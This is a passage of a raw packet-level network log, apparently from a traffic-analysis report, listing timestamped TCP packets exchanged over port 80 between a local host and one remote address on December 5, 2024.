                                                                                                                                                        Dec 5, 2024 05:37:58.770852089 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770863056 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770875931 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770884991 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.770890951 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770900011 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.770909071 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770910978 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.770927906 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.770960093 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.890455961 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.890506029 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.890523911 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.890563011 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.894638062 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.894680977 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.962730885 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.962786913 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.962937117 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.962989092 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.966865063 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.966922998 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.967001915 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.967041016 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.975287914 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.975352049 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.975399971 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.975433111 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.983686924 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.983736992 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.983797073 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.983834028 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.992084980 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.992149115 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.992216110 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.992250919 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.000541925 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.000617027 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.000633955 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.000669003 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.009005070 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.009051085 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.009059906 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.009085894 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.017328024 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.017376900 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.017445087 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.017484903 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.025787115 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.025855064 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.025897026 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.025930882 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.034178972 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.034264088 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.034279108 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.034317017 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.041763067 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.041815042 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.041855097 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.041898966 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.154911995 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.154979944 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.154997110 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.155013084 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.157201052 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.157252073 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.157309055 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.157352924 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.161966085 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.162022114 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.162045002 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.162084103 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.166703939 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.166752100 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.166815042 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.166856050 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.171432018 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.171475887 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.171546936 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.171593904 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.176186085 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.176229954 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.176315069 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.176357985 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.180927038 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.180969954 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.181118965 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.181154966 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.185627937 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.185673952 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.185744047 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.185785055 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.190401077 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.190444946 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.190547943 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.190589905 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.195173025 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.195216894 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.195271969 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.195316076 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.199858904 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.199904919 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.199984074 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.200026989 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.204617977 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.204667091 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.204708099 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.204750061 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.209362030 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.209409952 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.209491968 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.209534883 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.214103937 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.214148998 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.214205980 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.214246035 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.218827009 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.218871117 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.218934059 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.218975067 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.223525047 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.223568916 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.223645926 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.223686934 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.228260040 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.228301048 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.228353977 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.228393078 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.233017921 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.233061075 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.233119965 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.233160019 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.237790108 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.237838984 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.237840891 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.237869024 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.346940994 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.347012043 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.347080946 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.347116947 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.348977089 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.349041939 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.349078894 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.349117041 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.353156090 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.353199959 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.353276968 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.353322983 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.357207060 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.357253075 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.357353926 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.357398033 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.361296892 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.361341000 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.361409903 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.361453056 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.365401983 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.365447998 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.365506887 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.365550995 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.369508982 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.369553089 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.369635105 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.369678974 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.373593092 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.373636961 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.373673916 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.373718977 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.377718925 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.377764940 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.377827883 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.377867937 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.381812096 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.381860018 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.381937027 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.381978035 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.385937929 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.385981083 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.386039019 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.386080980 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.390022993 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.390067101 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.390099049 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.390135050 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.394153118 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.394201040 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.394295931 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.394339085 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.398232937 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.398273945 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.398335934 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.398376942 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.402339935 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.402385950 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.402456045 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.402498007 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.406447887 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.406497955 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.406558990 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.406599045 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.410048962 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.410094976 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.410162926 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.410233974 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.413647890 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.413697004 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.413817883 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.413861990 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.417270899 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.417316914 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.417402029 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.417448044 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.421040058 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.421082973 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.421216011 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.421257973 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.424561024 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.424604893 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.424776077 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.424818039 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.428106070 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.428174973 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.428222895 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.428267956 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.431701899 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.431747913 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.431798935 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.431838036 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.435307026 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.435350895 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.435425997 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.435468912 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.438927889 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.438973904 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.439011097 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.439052105 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.442518950 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.442576885 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.442642927 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.442688942 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.446149111 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.446208954 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.446266890 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.446305037 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.449695110 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.449743986 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:03.771225929 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:03.771507978 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:05.621332884 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:26.836599112 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:26.956399918 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:26.956653118 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:26.956653118 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:27.079873085 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068022966 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068080902 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068094969 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068130016 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.068180084 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068192005 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068216085 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.068248034 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068259001 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068279982 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.068439960 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068449974 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068466902 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.068475962 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.068504095 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.189172029 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.189304113 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.189357996 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.260175943 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.260287046 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.260334015 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.264362097 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.264489889 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.264528990 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.272793055 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.272912025 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.272953987 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.280796051 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.280922890 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.280963898 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.289211035 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.289321899 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.289355993 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.297621965 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.297699928 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.297744036 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.305984020 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.306124926 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.306236982 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.314533949 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.314547062 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.314591885 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.322804928 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.322911024 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.322983027 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.331191063 CET8049759172.245.123.3192.168.2.6
